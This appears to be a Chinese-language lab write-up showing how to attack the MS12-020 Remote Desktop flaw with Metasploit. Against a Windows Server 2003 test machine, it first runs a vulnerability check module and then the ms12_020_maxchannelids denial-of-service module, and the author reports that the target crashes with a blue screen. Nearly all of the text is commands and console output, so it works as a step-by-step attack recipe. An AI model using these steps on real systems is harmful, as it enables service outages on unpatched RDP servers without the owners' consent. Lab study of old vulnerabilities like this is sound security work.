使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程

前言

攻击者向受影响的系统发送一系列特制 RDP 数据包，则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下，任何 Windows 操作系统都未启用远程桌面协议 (RDP，默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。

0x01 实验环境

攻击机：kali linux
ip:192.168.8.130
目标机：windows server 2003 Enterprise x64 SP2
ip:192.168.8.129

0x02 漏洞验证

使用msf的模块：auxiliary/scanner/rdp/ms12_020_check验证目标机是否具有此漏洞

msf > use auxiliary/scanner/rdp/ms12_020_checkmsf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129msf auxiliary(ms12_020_check) > info       Name: MS12-020 Microsoft Remote Desktop Checker     Module: auxiliary/scanner/rdp/ms12_020_check    License: Metasploit Framework License (BSD)       Rank: NormalProvided by:  Royce Davis "R3dy" <rdavis@accuvant.com>  Brandon McCann "zeknox" <bmccann@accuvant.com>Basic options:  Name     Current Setting  Required  Description  ----     ---------------  --------  -----------  RHOSTS   192.168.8.129    yes       The target address range or CIDR identifier  RPORT    3389             yes       Remote port running RDP (TCP)  THREADS  100              yes       The number of concurrent threadsDescription:  This module checks a range of hosts for the MS12-020 vulnerability.   This does not cause a DoS on the target.References:  https://cvedetails.com/cve/CVE-2012-0002/  https://technet.microsoft.com/en-us/library/security/MS12-020  http://technet.microsoft.com/en-us/security/bulletin/ms12-020  https://www.exploit-db.com/exploits/18606  https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

运行后显示目标系统具有此漏洞：

msf auxiliary(ms12_020_check) > run[+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

0x03 漏洞利用

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelidsmsf auxiliary(ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   RHOST  192.168.8.129    yes       The target address   RPORT  3389             yes       The target port (TCP)msf auxiliary(ms12_020_maxchannelids) > run[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down[*] Auxiliary module execution completed

运行模块后，目标系统windows server 2003 蓝屏宕机：